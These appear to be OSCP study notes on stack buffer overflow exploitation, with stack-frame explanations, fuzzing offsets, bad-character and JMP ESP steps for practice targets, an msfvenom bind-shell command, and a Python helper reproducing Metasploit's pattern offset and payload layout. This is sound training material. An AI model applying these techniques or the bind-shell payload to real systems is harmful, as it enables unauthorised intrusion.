OSCP
Study about buffer overflow
Buffer overflow
Steps:
1. Crash the application
2. Find EIP
3. Control ESP
4. Identify bad characters
5. Find JMP ESP
6. Generate shellcode
7. Exploit
Definitions:
EIP - The Extended Instruction Pointer (EIP) is a register that contains the address of the next instruction for the program or command.
ESP - The Extended Stack Pointer (ESP) is a register that lets you know where on the stack you are and allows you to push data in and out of the application.
JMP - The Jump (JMP) instruction performs an unconditional jump, transferring the flow of execution by changing the EIP register.
\x41, \x42, \x43 - The hexadecimal values for A, B and C. For this exercise, there is no benefit to using hex vs ascii, it's just my personal preference.
=======================================================
Buffer overflow
stack demo
0040153B  0040156B
the stack grows from high to low memory (LIFO)
a value (11223344) is pushed on the stack inside the function; the address of the next instruction is also put on the stack, because on return that address is taken back into EIP (the instruction pointer) and execution continues from there
the return address is pushed on the stack when CALL executes
00401565 - return address
EBP register - frame pointer (base pointer)
push ebp
winding and unwinding
leave
after RET, EIP holds the return address
the return address is now popped
debugger layout: left pane - disassembly of the binary; right pane - CPU registers; bottom left pane - memory dump; bottom right pane - stack
pushed in order: return address, ebp, local variables
frame pointer - ebp (the current value of the ebp register)
after LEAVE the saved frame pointer has been popped from the stack; RET then pops the return address into EIP, and EIP now points at the instruction following the call
==================================================
stack winding and unwinding - 2
main - f1, f2, f3
push the argument on the stack, then push the return address, then push ebp (frame pointer) [the current value of the EBP register onto the stack]
then again for the 2nd function (222222): push the return address, then push ebp (frame pointer)
after all the pushes (winding), unwinding starts
==================================================
tampering with the return address
a value on the stack is modified so that the return address redirects to a function that should not execute [after checking the value the process exits, so it will not crash]; change the address to point to that function
=================================================
returning into shellcode
msfvenom -p windows/shell_bind_tcp -f c
the shellcode's address is found in memory, then it is run; it will open port 4444 and the attacker is able to connect to it
================================================
concept 1 - understand pushing the argument, return address, ebp and local variables (winding and unwinding)
concept 2 - be able to modify the return address value on the stack
concept 3 - manage to put code into the program; then it is possible to redirect the return address into the shellcode
===============================================
overwriting the stack with user input
gets(buffer)
    char buffer[1];
    gets(buffer);
    printf("%s\n", buffer);
the stack grows from high memory to low memory [down to up]; gets() ends up writing from low memory to high memory
overwrite stack
get the input from the user, print the user details
practice targets: minishare, vulnserver, slmail (xp 32-bit sp2)
priv esc - g0tmi1k; windows - fuzzysecurity
after chapter 6
=============================================
overwriting the stack remotely
140 - windows, 141 - brainpan
first send a long run of A's, then the application will crash
then pattern_create.rb -l 1000 (Metasploit)
EIP - 35724134
pattern_offset - 524
"A" * 524 + "B" * 4 + "C" * 100
EIP - 42 (the B's)
EOX - 4141414
ESP - the C's, right after 4242
add the bad-character string to the python file
replace the C's with the badchars
follow ESP in the dump
bad: 04, 05, 54, 55, b0
find the bad characters and remove them from the exploit file
need jmp esp
!mona modules
find jmp esp - 311712F3
write the jmp esp address into the code in reverse byte order (little endian)
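Added example (not part of the original notes): a Python re-implementation of the pattern_create / pattern_offset step above, so the mapping from the crash value 35724134 to offset 524 is visible, plus the bad-character string with the bytes found above (04, 05, 54, 55, b0) excluded. The alphabet is Metasploit's; the function names are mine, and skipping 0x00 in the bad-character string is an assumption.

```python
import struct

# Metasploit's pattern alphabet: every 3-byte "Upper lower digit" triplet is
# unique within the first 20280 bytes, so any 4 consecutive bytes pin one offset.
UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGITS = "0123456789"


def pattern_create(length: int) -> bytes:
    """Same output as pattern_create.rb -l <length> (helper written for this example)."""
    out = ""
    for triplet in (u + l + d for u in UPPER for l in LOWER for d in DIGITS):
        if len(out) >= length:
            break
        out += triplet
    return out[:length].encode()


def pattern_offset(eip_hex: str, length: int = 1000) -> int:
    """Same job as pattern_offset.rb. The debugger prints EIP as one big-endian
    number, but the bytes sit in the buffer little-endian: 35724134 is the
    substring "4Ar5". Returns -1 when the value did not come from the pattern."""
    needle = struct.pack("<I", int(eip_hex, 16))
    return pattern_create(length).find(needle)


def build_poc(offset: int, eip: bytes = b"B" * 4, tail: bytes = b"C" * 100) -> bytes:
    """The "A"*524 + "B"*4 + "C"*100 layout from the notes: the 4 bytes after the
    padding land in EIP and ESP points at the start of the tail."""
    return b"A" * offset + eip + tail


def badchars(exclude=()) -> bytes:
    """Byte values 0x01..0xFF minus the ones the dump showed mangled.
    0x00 is skipped from the start (assumption: it terminates C strings)."""
    skip = set(exclude)
    return bytes(b for b in range(1, 256) if b not in skip)


if __name__ == "__main__":
    off = pattern_offset("35724134")            # 524, as in the notes
    poc = build_poc(off)
    print(off, poc[off:off + 4])                 # 524 b'BBBB'
    print(len(badchars([0x04, 0x05, 0x54, 0x55, 0xB0])))  # 250
```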